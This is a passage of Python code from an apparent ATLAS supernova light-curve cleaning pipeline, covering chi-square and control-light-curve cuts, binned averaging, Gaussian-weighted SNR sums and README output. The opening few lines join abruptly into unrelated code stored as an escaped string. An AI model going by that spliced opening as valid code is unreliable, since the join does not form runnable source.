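    if lim_to_prioritize == 'contamination':
        return contam_cut
    return loss_cut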
We suggest resetting your limits in params.ini.')\n\t\t\telse:\n\t\t\t\tif final_cut == contam_cut_data['cut']:\n\t\t\t\t\tPcontamination = contam_cut_data['Pcontamination']\n\t\t\t\t\tPloss = contam_cut_data['Ploss']\n\t\t\t\telse:\n\t\t\t\t\tPcontamination = loss_cut_data['Pcontamination']\n\t\t\t\t\tPloss = loss_cut_data['Ploss']\n\t\t\t\tprint(f'# Final suggested chi-square cut is {final_cut:0.2f}, with {Pcontamination:0.2f}% contamination and {Ploss:0.2f}% loss.')\n\t\t\t\tif (Pcontamination > self.contam_lim):\n\t\t\t\t\tprint(f'## WARNING: Final cut\\'s contamination {Pcontamination:0.2f}% exceeds {self.contam_lim:0.2f}%!')\n\t\t\t\tif (Ploss > self.loss_lim):\n\t\t\t\t\tprint(f'## WARNING: Final cut\\'s loss {Ploss:0.2f}% exceeds loss_lim {self.loss_lim:0.2f}%!')\n\t\t\n\t\t\toutput = f'\\n\\t- The cut optimized according to the given contamination limit of {self.contam_lim:0.2f}% was {contam_cut_data[\"cut\"]:0.2f}, with a contamination of {contam_cut_data[\"Pcontamination\"]:0.2f}% and a loss of {contam_cut_data[\"Ploss\"]:0.2f}%.'\n\t\t\toutput += f'\\n\\t- The cut optimized according to the given loss limit of {self.loss_lim:0.2f}% was {loss_cut_data[\"cut\"]:0.2f}, with a contamination of {loss_cut_data[\"Pcontamination\"]:0.2f}% and a loss of {loss_cut_data[\"Ploss\"]:0.2f}%.'\n\t\telse:\n\t\t\tfinal_cut = self.chisquare_cut\n\n\t\t\tprint(f'Chi-square cut set to {final_cut} manually by user, overriding dynamic chi-square cut')\n\t\t\toutput = f'Cut was manually set to {final_cut} by user, overriding dynamic chi-square cut.'\n\n\t\t# update SN mask column with final chi-square cut and apply same cut to control light curves\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tcut_ix = lc.lcs[control_index].ix_inrange(colnames=['chi/N'], lowlim=final_cut, exclude_lowlim=True)\n\t\t\tlc.update_mask_col(self.flags['chisquare'], cut_ix, control_index=control_index)\n\t\t\tif control_index == 0:\n\t\t\t\ts = f'Total percent of data flagged: {100*len(cut_ix)/len(lc.lcs[0].getindices()):0.2f}%'\n\t\t\t\toutput += f'\\n\\n{s}.'\n\t\t\t\tprint(f'# {s}')\n\n\t\tif args.plot:\n\t\t\treturn lc, final_cut, output, plot\n\t\telse:\n\t\t\treturn lc, final_cut, output\n\n\t# make sure that for every SN measurement, we have corresponding control light curve \n\t# measurements at that MJD\n\tdef verify_mjds(self, lc):\n\t\tprint('# Making sure SN and control light curve MJDs match up exactly...')\n\t\t# sort SN lc by MJD\n\t\tmjd_sorted_i = lc.lcs[0].ix_sort_by_cols('MJD')\n\t\tlc.lcs[0].t = lc.lcs[0].t.loc[mjd_sorted_i]\n\t\tsn_sorted = lc.lcs[0].t.loc[mjd_sorted_i,'MJD'].to_numpy()\n\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\t# sort control light curves by MJD\n\t\t\tmjd_sorted_i = lc.lcs[control_index].ix_sort_by_cols('MJD')\n\t\t\tcontrol_sorted = lc.lcs[control_index].t.loc[mjd_sorted_i,'MJD'].to_numpy()\n\t\t\t\n\t\t\t# compare control light curve to SN light curve and, if out of agreement, fix\n\t\t\tif (len(sn_sorted) != len(control_sorted)) or (np.array_equal(sn_sorted, control_sorted) is False):\n\t\t\t\tprint('## MJDs out of agreement for control light curve %03d, fixing...' % control_index)\n\n\t\t\t\tmjds_onlysn = AnotB(sn_sorted, control_sorted)\n\t\t\t\tmjds_onlycontrol = AnotB(control_sorted, sn_sorted)\n\n\t\t\t\t# for the MJDs only in SN, add row with that MJD to control light curve, with all values of other columns NaN\n\t\t\t\tif len(mjds_onlysn) > 0:\n\t\t\t\t\tprint('### Adding %d NaN rows to control light curve...' 
% len(mjds_onlysn))\n\t\t\t\t\tfor mjd in mjds_onlysn:\n\t\t\t\t\t\tlc.lcs[control_index].newrow({'MJD':mjd,'Mask':0})\n\t\t\t\t\n\t\t\t\t# remove indices of rows in control light curve for which there is no MJD in the SN lc\n\t\t\t\tif len(mjds_onlycontrol) > 0:\n\t\t\t\t\tprint('### Removing %d control light curve row(s) without matching SN row(s)...' % len(mjds_onlycontrol))\n\t\t\t\t\tindices2skip = []\n\t\t\t\t\tfor mjd in mjds_onlycontrol:\n\t\t\t\t\t\tix = lc.lcs[control_index].ix_equal('MJD',mjd)\n\t\t\t\t\t\tif len(ix)!=1:\n\t\t\t\t\t\t\traise RuntimeError(f'### Couldn\\'t find MJD={mjd} in column MJD, but should be there!')\n\t\t\t\t\t\tindices2skip.extend(ix)\n\t\t\t\t\tindices = AnotB(lc.lcs[control_index].getindices(),indices2skip)\n\t\t\t\telse:\n\t\t\t\t\tindices = lc.lcs[control_index].getindices()\n\t\t\t\t\n\t\t\t\tix_sorted = lc.lcs[control_index].ix_sort_by_cols('MJD',indices=indices)\n\t\t\t\tlc.lcs[control_index].t = lc.lcs[control_index].t.loc[ix_sorted]\n\t\t\n\t\treturn lc \n\n\tdef get_control_stats(self, lc):\n\t\tprint('# Calculating control light curve statistics...')\n\n\t\t# construct arrays for control lc data\n\t\tuJy = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), np.nan)\n\t\tduJy = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), np.nan)\n\t\tMask = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), 0, dtype=np.int32)\n\t\t\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\tif (len(lc.lcs[control_index].t) != len(lc.lcs[0].t['MJD'])) or (np.array_equal(lc.lcs[0].t['MJD'], lc.lcs[control_index].t['MJD']) is False):\n\t\t\t\traise RuntimeError(f'## ERROR: SN lc not equal to control lc for control_index {control_index}! Rerun or debug verify_mjds().')\n\t\t\telse:\n\t\t\t\tuJy[control_index-1,:] = lc.lcs[control_index].t['uJy']\n\t\t\t\tduJy[control_index-1,:] = lc.lcs[control_index].t[lc.dflux_colnames[control_index]]\n\t\t\t\tMask[control_index-1,:] = lc.lcs[control_index].t['Mask']\n\n\t\tc2_param2columnmapping = lc.lcs[0].intializecols4statparams(prefix='c2_',format4outvals='{:.2f}',skipparams=['converged','i'])\n\n\t\tfor index in range(uJy.shape[-1]):\n\t\t\tpda4MJD = pdastrostatsclass()\n\t\t\tpda4MJD.t['uJy'] = uJy[0:,index]\n\t\t\tpda4MJD.t['duJy'] = duJy[0:,index]\n\t\t\tpda4MJD.t['Mask'] = np.bitwise_and(Mask[0:,index], self.flags['chisquare']|self.flags['uncertainty'])\n\t\t\t\n\t\t\tpda4MJD.calcaverage_sigmacutloop('uJy',noisecol='duJy',maskcol='Mask',maskval=(self.flags['chisquare']|self.flags['uncertainty']),verbose=1,Nsigma=3.0,median_firstiteration=True)\n\t\t\tlc.lcs[0].statresults2table(pda4MJD.statparams, c2_param2columnmapping, destindex=index) \n\n\t\treturn lc\n\n\tdef print_control_flag_stats(self, lc):\n\t\tprint('# Control light curve cut results:')\n\t\tprint('## Length of SN light curve: %d' % len(lc.lcs[0].t))\n\t\tprint('## Percent of data above x2_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_x2']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data above stn_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_stn']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data above Nclip_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_Nclip']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data below Ngood_min bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_Ngood']))/len(lc.lcs[0].t)))\n\t\t\n\t\ts = 'Total percent of data flagged as bad: %0.2f%%' % 
(100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_bad']))/len(lc.lcs[0].t))\n\t\tprint(f'## {s}')\n\t\toutput = f'\\n\\n {s}.'\n\t\ts = 'Total percent of data flagged as questionable (not masked with control light curve flags but Nclip > 0): %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_questionable']))/len(lc.lcs[0].t))\n\t\tprint(f'## {s}')\n\t\toutput += f'\\n {s}.'\n\n\t\treturn output\n\n\t# apply control light curve cut to SN light curve and update mask column with flag\n\tdef apply_control_cut(self, lc):\n\t\tprint('\\nNow applying control light curve cut...')\n\n\t\t# clear any previous flags in control light curves' 'Mask' columns\n\t\t#for control_index in range(1,self.num_controls+1):\n\t\t\t#lc.lcs[control_index].t['Mask'] = 0\n\n\t\t#lc = self.verify_mjds(lc)\n\t\tlc = self.get_control_stats(lc)\n\n\t\tprint('# Flagging SN light curve based on control light curve statistics...')\n\t\tlc.lcs[0].t['c2_abs_stn'] = (lc.lcs[0].t['c2_mean']/lc.lcs[0].t['c2_mean_err']).abs() # abs() so the stn_max bound below matches the documented abs(flux/dflux) criterion\n\n\t\t# flag measurements according to given bounds\n\t\tflag_x2_i = lc.lcs[0].ix_inrange(colnames=['c2_X2norm'], lowlim=self.c_x2_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_x2'], flag_x2_i)\n\t\tflag_stn_i = lc.lcs[0].ix_inrange(colnames=['c2_abs_stn'], lowlim=self.stn_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_stn'], flag_stn_i)\n\t\tflag_nclip_i = lc.lcs[0].ix_inrange(colnames=['c2_Nclip'], lowlim=self.c_Nclip_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_Nclip'], flag_nclip_i)\n\t\tflag_ngood_i = lc.lcs[0].ix_inrange(colnames=['c2_Ngood'], uplim=self.c_Ngood_min, exclude_uplim=True)\n\t\tlc.update_mask_col(self.flags['controls_Ngood'], flag_ngood_i)\n\n\t\t# update mask column with control light curve cut on any measurements flagged according to given bounds\n\t\tzero_Nclip_i = lc.lcs[0].ix_equal('c2_Nclip', 0)\n\t\tunmasked_i = lc.lcs[0].ix_unmasked('Mask', maskval=self.flags['controls_x2']|self.flags['controls_stn']|self.flags['controls_Nclip']|self.flags['controls_Ngood'])\n\t\tlc.update_mask_col(self.flags['controls_questionable'], AnotB(unmasked_i,zero_Nclip_i))\n\t\tlc.update_mask_col(self.flags['controls_bad'], AnotB(lc.lcs[0].getindices(),unmasked_i))\n\n\t\t# copy over SN's control cut flags to control light curve 'Mask' column\n\t\tflags_arr = np.full(lc.lcs[0].t['Mask'].shape, (self.flags['controls_bad']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_questionable']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_x2']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_stn']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_Nclip']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_Ngood']))\n\t\tflags_to_copy = np.bitwise_and(lc.lcs[0].t['Mask'], flags_arr)\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\tlc.lcs[control_index].t['Mask'] = lc.lcs[control_index].t['Mask'].astype(np.int32)\n\t\t\tif len(lc.lcs[control_index].t) < 1:\n\t\t\t\tcontinue\n\t\t\telif len(lc.lcs[control_index].t) == 1:\n\t\t\t\tlc.lcs[control_index].t.loc[0,'Mask']= int(lc.lcs[control_index].t.loc[0,'Mask']) | flags_to_copy\n\t\t\telse:\n\t\t\t\tlc.lcs[control_index].t['Mask'] = np.bitwise_or(lc.lcs[control_index].t['Mask'], flags_to_copy)\n\t\t\n\t\toutput = self.print_control_flag_stats(lc)\n\n\t\treturn lc, output\n\n\tdef average_lc(self, lc, avglc, control_index=0):\n\t\tif control_index == 0:\n\t\t\tprint(f'\\nNow averaging SN light curve...')\n\t\telse:\n\t\t\tprint(f'Now 
averaging control light curve {control_index:03d}...')\n\n\t\tavglc.lcs[control_index] = pdastrostatsclass()\n\n\t\tmjd = int(np.amin(lc.lcs[control_index].t['MJD']))\n\t\tmjd_max = int(np.amax(lc.lcs[control_index].t['MJD']))+1\n\n\t\tgood_i = lc.lcs[control_index].ix_unmasked('Mask', maskval=self.flags['chisquare']|self.flags['uncertainty']|self.flags['controls_bad'])\n\n\t\twhile mjd <= mjd_max:\n\t\t\trange_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=mjd, uplim=mjd+self.mjd_bin_size, exclude_uplim=True)\n\t\t\trange_good_i = AandB(range_i,good_i)\n\n\t\t\t# add new row to averaged light curve if keep_empty_bins or any measurements present\n\t\t\t#if self.keep_empty_bins or len(range_i) >= 1:\n\t\t\tnew_row = {'MJDbin':mjd+0.5*self.mjd_bin_size, 'Nclip':0, 'Ngood':0, 'Nexcluded':len(range_i)-len(range_good_i), 'Mask':0}\n\t\t\tavglc_index = avglc.lcs[control_index].newrow(new_row)\n\t\t\t\n\t\t\t# if no measurements present, flag or skip over day\n\t\t\tif len(range_i) < 1:\n\t\t\t\t#if self.keep_empty_bins:\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t# if no good measurements, average values anyway and flag\n\t\t\tif len(range_good_i) < 1:\n\t\t\t\t# average flux\n\t\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', noisecol=lc.dflux_colnames[control_index], indices=range_i, Nsigma=3.0, median_firstiteration=True)\n\t\t\t\tfluxstatparams = deepcopy(lc.lcs[control_index].statparams)\n\n\t\t\t\t# get average mjd\n\t\t\t\t# TO DO: SHOULD NOISECOL HERE BE DUJY OR NONE??\n\t\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('MJD', indices=fluxstatparams['ix_good'], Nsigma=0, median_firstiteration=False)\n\t\t\t\tavg_mjd = lc.lcs[control_index].statparams['mean']\n\n\t\t\t\t# add row and flag\n\t\t\t\tavglc.lcs[control_index].add2row(avglc_index, {'MJD':avg_mjd, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'uJy':fluxstatparams['mean'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'duJy':fluxstatparams['mean_err'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'stdev':fluxstatparams['stdev'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'x2':fluxstatparams['X2norm'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Nclip':fluxstatparams['Nclip'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Ngood':fluxstatparams['Ngood'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Mask':0})\n\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t# average good measurements\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', noisecol=lc.dflux_colnames[control_index], indices=range_good_i, Nsigma=3.0, median_firstiteration=True)\n\t\t\tfluxstatparams = deepcopy(lc.lcs[control_index].statparams)\n\n\t\t\tif fluxstatparams['mean'] is None or len(fluxstatparams['ix_good']) < 1:\n\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\n\t\t\t# get average mjd\n\t\t\t# TO DO: SHOULD NOISECOL HERE BE DUJY OR NONE??\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('MJD', noisecol=lc.dflux_colnames[control_index], indices=fluxstatparams['ix_good'], Nsigma=0, median_firstiteration=False)\n\t\t\tavg_mjd = 
lc.lcs[control_index].statparams['mean']\n\n\t\t\t# add row to averaged light curve\n\t\t\tavglc.lcs[control_index].add2row(avglc_index, {'MJD':avg_mjd, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'uJy':fluxstatparams['mean'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'duJy':fluxstatparams['mean_err'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'stdev':fluxstatparams['stdev'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'x2':fluxstatparams['X2norm'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Nclip':fluxstatparams['Nclip'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Ngood':fluxstatparams['Ngood'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Mask':0})\n\t\t\t\n\t\t\t# flag clipped measurements in lc\n\t\t\tif len(fluxstatparams['ix_clip']) > 0:\n\t\t\t\tlc.update_mask_col(self.flags['avg_ixclip'], fluxstatparams['ix_clip'], control_index=control_index)\n\t\t\t\n\t\t\t# if small number within this bin, flag measurements\n\t\t\tif len(range_good_i) < 3:\n\t\t\t\tlc.update_mask_col(self.flags['avg_smallnum'], range_good_i, control_index=control_index) # TO DO: CHANGE TO RANGE_I??\n\t\t\t\tavglc.update_mask_col(self.flags['avg_smallnum'], [avglc_index], control_index=control_index)\n\t\t\t# else check sigmacut bounds and flag\n\t\t\telse:\n\t\t\t\tis_bad = False\n\t\t\t\tif fluxstatparams['Ngood'] < self.g_Ngood_min:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif fluxstatparams['Nclip'] > self.g_Nclip_max:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif not(fluxstatparams['X2norm'] is None) and fluxstatparams['X2norm'] > self.g_x2_max:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif is_bad:\n\t\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\n\t\t\tmjd += self.mjd_bin_size\n\t\t\n\t\t# convert flux to magnitude and dflux to dmagnitude\n\t\tavglc.lcs[control_index].flux2mag('uJy','duJy','m','dm', zpt=23.9, upperlim_Nsigma=self.flux2mag_sigmalimit)\n\n\t\tavglc = self.drop_extra_columns(avglc)\n\n\t\tfor col in ['Nclip','Ngood','Nexcluded','Mask']: \n\t\t\tavglc.lcs[control_index].t[col] = avglc.lcs[control_index].t[col].astype(np.int32)\n\n\t\treturn lc, avglc\n\n\t# average the SN light curve and, if necessary, control light curves\n\tdef average(self, lc, avglc):\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\t# only average control light curves if detecting pre-SN bumps\n\t\t\tif (not(self.detect_bumps) or (self.detect_bumps and not(self.apply_to_controls))) and control_index > 0:\n\t\t\t\tbreak\n\n\t\t\tlc, avglc = self.average_lc(lc, avglc, control_index)\n\n\t\ts = 'Total percent of data flagged: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['avg_badday']))/len(lc.lcs[0].t)) # fraction of the unbinned light curve, consistent with the other cuts\n\t\tprint(f'# {s}')\n\t\toutput = f'\\n\\n{s}.'\n\n\t\treturn lc, avglc, output\n\n\t# add simulated bump if necessary and apply rolling gaussian weighted sum to light curve\n\tdef apply_gaussian(self, avglc, control_index=0, simparams=None, filt=None):\n\t\tif self.start_mjd is None:\n\t\t\tself.start_mjd = avglc.lcs[control_index].t['MJDbin'].iloc[0]\n\t\tif self.end_mjd is None:\n\t\t\tself.end_mjd = avglc.lcs[control_index].t['MJDbin'].iloc[-1]\n\t\tix = avglc.lcs[control_index].ix_inrange(colnames=['MJDbin'],lowlim=self.start_mjd, uplim=self.end_mjd)\n\t\tif len(ix) <= 0:\n\t\t\traise RuntimeError('ERROR: specified MJD range contains no measurements!')\n\t\tprint(f'# Applying detection to specified MJD bin range: {avglc.lcs[control_index].t[\"MJDbin\"].iloc[ix[0]]} to {avglc.lcs[control_index].t[\"MJDbin\"].iloc[ix[-1]]}')\n\n\t\tgood_ix = 
avglc.lcs[control_index].ix_unmasked('Mask',self.flags['avg_badday'])\n\n\t\t# make sure there are no lingering simulations\n\t\tdropcols=[]\n\t\tfor col in ['uJysim','SNRsim','simLC','SNRsimsum']:\n\t\t\tif col in avglc.lcs[control_index].t.columns:\n\t\t\t\tdropcols.append(col)\n\t\tif len(dropcols) > 0:\n\t\t\tavglc.lcs[control_index].t.drop(columns=dropcols,inplace=True)\n\n\t\tavglc.lcs[control_index].t.loc[ix, 'SNR'] = 0.0\n\t\tavglc.lcs[control_index].t.loc[good_ix,'SNR'] = avglc.lcs[control_index].t.loc[good_ix,'uJy']/avglc.lcs[control_index].t.loc[good_ix,'duJy']\n\n\t\tif not(simparams is None):\n\t\t\tpeakMJDs = simparams['sim_peakMJD'].split(',')\n\t\t\t\n\t\t\t# get the simulated gaussian\n\t\t\tmjds = avglc.lcs[control_index].t.loc[good_ix,'MJD']\n\t\t\tavglc.lcs[control_index].t.loc[good_ix,'uJysim'] = avglc.lcs[control_index].t.loc[good_ix,'uJy']\n\t\t\tavglc.lcs[control_index].t.loc[ix,'simLC'] = 0.0\n\t\t\tfor peakMJD in peakMJDs:\n\t\t\t\tpeakMJD = float(peakMJD)\n\t\t\t\tprint(f'## Adding simulated gaussian at peak MJD {peakMJD:0.2f} with apparent magnitude {simparams[\"sim_appmag\"]:0.2f}, sigma- of {simparams[\"sim_sigma_minus\"]:0.2f}, and sigma+ of {simparams[\"sim_sigma_plus\"]:0.2f}')\n\n\t\t\t\t# get simulated gaussian flux and add to light curve flux\n\t\t\t\tsimflux = gauss2lc(mjds, peakMJD, simparams['sim_sigma_minus'], simparams['sim_sigma_plus'], app_mag=simparams['sim_appmag'])\n\t\t\t\tavglc.lcs[control_index].t.loc[good_ix,'uJysim'] += simflux\n\n\t\t\t\t# get the simulated lc for all MJDs\n\t\t\t\tsimflux_all = gauss2lc(avglc.lcs[control_index].t.loc[ix,'MJDbin'], peakMJD, simparams['sim_sigma_minus'], simparams['sim_sigma_plus'], app_mag=simparams['sim_appmag'])\n\t\t\t\tavglc.lcs[control_index].t.loc[ix,'simLC'] += simflux_all\n\n\t\t\t# make sure all bad rows have SNRsim = 0.0 so they have no impact on the rolling SNRsum\n\t\t\tavglc.lcs[control_index].t.loc[ix,'SNRsim'] = 0.0\n\t\t\t# include simflux in the SNR\n\t\t\tavglc.lcs[control_index].t.loc[good_ix,'SNRsim'] = avglc.lcs[control_index].t.loc[good_ix,'uJysim']/avglc.lcs[control_index].t.loc[good_ix,'duJy']\n\n\t\tgaussian_sigma = round(self.gaussian_sigma/self.mjd_bin_size)\n\t\twindowsize = int(6*gaussian_sigma)\n\t\thalfwindowsize = int(windowsize*0.5)+1\n\t\tprint(f'## Sigma (days): {self.gaussian_sigma:0.2f}; MJD bin size (days): {self.mjd_bin_size:0.2f}; sigma (bins): {gaussian_sigma:0.2f}; window size (bins): {windowsize}')\n\n\t\t# calculate the rolling SNR sum\n\t\t\n\t\tdataindices = np.array(range(len(avglc.lcs[control_index].t.loc[ix])) + np.full(len(avglc.lcs[control_index].t.loc[ix]), halfwindowsize))\n\t\t\n\t\ttemp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='SNR', dtype=np.float64)\n\t\ttemp[dataindices] = avglc.lcs[control_index].t.loc[ix,'SNR']\n\n\t\tSNRsum = temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\tavglc.lcs[control_index].t.loc[ix,'SNRsum'] = list(SNRsum[dataindices])\n\t\t\n\t\tnorm_temp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='norm', dtype=np.float64)\n\t\tnorm_temp[np.array(range(len(avglc.lcs[control_index].t.loc[ix])) + np.full(len(avglc.lcs[control_index].t.loc[ix]), halfwindowsize))] = np.ones(len(avglc.lcs[control_index].t.loc[ix]))\n\t\tnorm_temp_sum = norm_temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\tavglc.lcs[control_index].t.loc[ix,'SNRsumnorm'] = list(SNRsum.loc[dataindices] / 
norm_temp_sum.loc[dataindices] * max(norm_temp_sum.loc[dataindices]))\n\n\t\t# calculate the rolling SNR sum for SNR with simflux\n\t\tif not(simparams is None):\n\t\t\ttemp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='SNRsim', dtype=np.float64)\n\t\t\ttemp[dataindices] = avglc.lcs[control_index].t.loc[ix,'SNRsim']\n\t\t\tSNRsimsum = temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\t\tavglc.lcs[control_index].t.loc[ix,'SNRsimsum'] = list(SNRsimsum.loc[dataindices])\n\n\t\treturn avglc\n\n\t# begin output text file with information on cuts and flags\n\tdef begin_readme(self, args, obj_index):\n\t\tf = open(f'{self.output_dir}/{args.tnsnames[obj_index]}/README.md','w+')\n\t\tf.write(f\"# SN {args.tnsnames[obj_index]} Light Curve Cleaning and Averaging\")\n\t\tf.write(f'\\n\\nThe ATLAS SN light curves are separated by filter (orange and cyan) and labelled as such in the file name. Averaged light curves contain an additional number in the file name that represents the MJD bin size used. Control light curves are located in the \"controls\" subdirectory and follow the same naming scheme, only with their control index added after the SN name.')\n\t\t\n\t\tf.write(f'\\n\\nThe following details the file names for each of the light curve versions:')\n\t\tf.write(f'\\n\\t- SN light curves: {args.tnsnames[obj_index]}.o.lc.txt and {args.tnsnames[obj_index]}.c.lc.txt')\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\t- Averaged light curves: {args.tnsnames[obj_index]}.o.{self.mjd_bin_size:0.2f}days.lc.txt and {args.tnsnames[obj_index]}.c.{self.mjd_bin_size:0.2f}days.lc.txt')\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\t- Control light curves, where X=001,...,{self.num_controls:03d}: {args.tnsnames[obj_index]}_iX.o.lc.txt and {args.tnsnames[obj_index]}_iX.c.lc.txt')\n\n\t\tf.write(f'\\n\\nThe following summarizes the hex values in the \"Mask\" column of each light curve for each cut applied (see below sections for more information on each cut): ')\n\t\tif self.uncertainties:\n\t\t\tf.write(f'\\n\\t- Uncertainty cut: {hex(self.flags[\"uncertainty\"])}')\n\t\tif self.chisquares:\n\t\t\tf.write(f'\\n\\t- Chi-square cut: {hex(self.flags[\"chisquare\"])}')\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\t- Control light curve cut: {hex(self.flags[\"controls_bad\"])}')\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\t- Bad day (for averaged light curves): {hex(self.flags[\"avg_badday\"])}')\n\n\t\treturn f\n\n\t# add information about each cut to output text file\n\tdef add_to_readme(self, f, lc, filt, final_cut=None, estimate_true_uncertainties_output=None, chisquare_output=None, uncertainty_output=None, templates_output=None, control_output=None, averaging_output=None):\n\t\tf.write(f'\\n\\n## FILTER: {filt}')\n\n\n\t\tif not(self.skip_tc):\n\t\t\tf.write('\\n\\n### Correction for ATLAS reference template changes')\n\t\t\tf.write(f'\\nWe take into account ATLAS\\'s periodic replacement of the difference image reference templates, which may cause step discontinuities in flux. 
Two template changes have been recorded at MJDs 58417 and 58882.')\n\t\t\tf.write(templates_output)\n\n\t\tif self.uncertainties:\n\t\t\tf.write(f'\\n\\n### Uncertainty cut')\n\t\t\tf.write(f'\\nWe flag measurements with an uncertainty (column name \"duJy\") value above {self.uncertainty_cut:0.2f} with hex value {hex(self.flags[\"uncertainty\"])}.')\n\t\t\tf.write(uncertainty_output)\n\n\t\tif self.estimate_true_uncertainties:\n\t\t\tf.write(f'\\n\\n### Estimating true uncertainties')\n\t\t\tf.write(f'\\nThis procedure attempts to account for an extra noise source in the data by estimating the true typical uncertainty, deriving the additional systematic uncertainty, and lastly applying this extra noise to a new uncertainty column \"duJy_new\". This new uncertainty column will be used in the cuts following this portion.')\n\t\t\tf.write(estimate_true_uncertainties_output)\n\n\t\tif self.chisquares:\n\t\t\tf.write(f'\\n\\n### Chi-square cut')\n\t\t\tf.write(f'\\nWe flag measurements with a chi-square (column name \"chi/N\") value above {final_cut:0.2f} with hex value {hex(self.flags[\"chisquare\"])}.')\n\t\t\tf.write(chisquare_output)\n\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\n### Control light curve cut')\n\t\t\tf.write(f'\\nThe control light curve cut examines each SN epoch and its corresponding control light curve measurements at that epoch, applies a 3-sigma-clipped average, calculates statistics, and then cuts bad epochs based on those returned statistics.')\n\t\t\tf.write(f'\\n\\nFor the given epoch, we flag the SN measurement for which the returned control statistics fulfill any of the following criteria with the hex value {hex(self.flags[\"controls_bad\"])}: ')\n\t\t\tf.write(f'\\n\\t- A returned chi-square > {self.c_x2_max:0.2f}')\n\t\t\tf.write(f'\\n\\t- A returned abs(flux/dflux) > {self.stn_max:0.2f}')\n\t\t\tf.write(f'\\n\\t- Number of clipped/\"bad\" measurements in the 3σ-clipped average > {self.c_Nclip_max}')\n\t\t\tf.write(f'\\n\\t- Number of used/\"good\" measurements in the 3σ-clipped average < {self.c_Ngood_min}')\n\t\t\tf.write(control_output)\n\n\t\tf.write(f'\\n\\n### After the uncertainty, chi-square, and control light curve cuts are applied, the light curves are resaved with the new \"Mask\" column.')\n\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\n### Averaging light curves and cutting bad days')\n\t\t\tf.write(f'\\nFor each MJD bin of size {self.mjd_bin_size:0.2f} day(s), we 